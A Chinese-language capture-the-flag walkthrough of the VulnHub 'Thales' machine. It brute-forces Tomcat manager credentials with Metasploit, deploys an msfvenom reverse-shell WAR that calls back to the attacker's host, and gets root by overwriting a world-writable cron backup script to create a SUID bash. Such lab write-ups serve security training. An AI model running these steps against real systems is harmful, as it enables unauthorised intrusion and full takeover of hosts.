打靶记录(一五三)之VulnHubThales

192.168.56.134

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub/thales]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 14:04 CST
Nmap scan report for 192.168.56.134
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 08:00:27:33:F9:BE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 21.09 seconds

┌──(mikannse㉿kali)-[~/vulnhub/thales]
└─$ sudo nmap -sT -sC -sV -O -p22,8080 192.168.56.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 14:05 CST
Nmap scan report for 192.168.56.134
Host is up (0.00068s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
|   256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_  256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.52
|_http-title: Apache Tomcat/9.0.52
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:33:F9:BE (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.55 seconds

TomcatRCE

使用msf爆破用户和密码，这里最好不要用其他工具像是hydra,否则会导致登录服务出现问题以至于正确的凭证也进不去

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.56.134
rhosts => 192.168.56.134
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
<SNIP>
[-] 192.168.56.134:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.56.134:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[+] 192.168.56.134:8080 - Login Successful: tomcat:role1

生成一个war包，进行反弹shell

┌──(mikannse㉿kali)-[~/vulnhub/thales]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.131 LPORT=443 -f war -o revshell.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes
Saved as: revshell.war

登陆进去之后在下面deploy上传，开启监听,然后访问/revshell,拿到shell

提权

用户桌面有一张notes.txt，有一个备份脚本，并且是所有人可写

tomcat@miletus:/home/thales$ ls -liah /usr/local/bin/backup.sh
ls -liah /usr/local/bin/backup.sh
126 -rwxrwxrwx 1 root root 612 Oct 14  2021 /usr/local/bin/backup.sh

上pspy搜寻一下,要等待个6,7分钟左右

tomcat@miletus:/tmp$ ./pspy64
./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
<SNIP>
2024/09/22 07:25:01 CMD: UID=0     PID=1338   | bash /usr/local/bin/backup.sh 
2024/09/22 07:25:01 CMD: UID=0     PID=1337   | /bin/sh -c bash /usr/local/bin/backup.sh 
2024/09/22 07:25:01 CMD: UID=0     PID=1336   | /usr/sbin/CRON -f 
2024/09/22 07:25:01 CMD: UID=0     PID=1339   | 
2024/09/22 07:25:01 CMD: UID=0     PID=1340   | hostname -s 
2024/09/22 07:25:01 CMD: UID=0     PID=1343   | /bin/sh -c gzip 
2024/09/22 07:25:01 CMD: UID=0     PID=1342   | tar czf /var/backups/miletus-Sunday.tgz /opt/tomcat/ 
2024/09/22 07:25:01 CMD: UID=0     PID=1344   | gzip 
2024/09/22 07:25:02 CMD: UID=0     PID=1345   | date 
2024/09/22 07:25:02 CMD: UID=0     PID=1346   | ls -lh /var/backups 

发现后台是有执行计划任务的

tomcat@miletus:/tmp$ echo "cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash" >/usr/local/bin/backup.sh

过了一会儿后

tomcat@miletus:/tmp$ ./root_bash -p
./root_bash -p
root_bash-4.4# whoami
whoami
root

碎碎念

被tomcat环境折磨了好久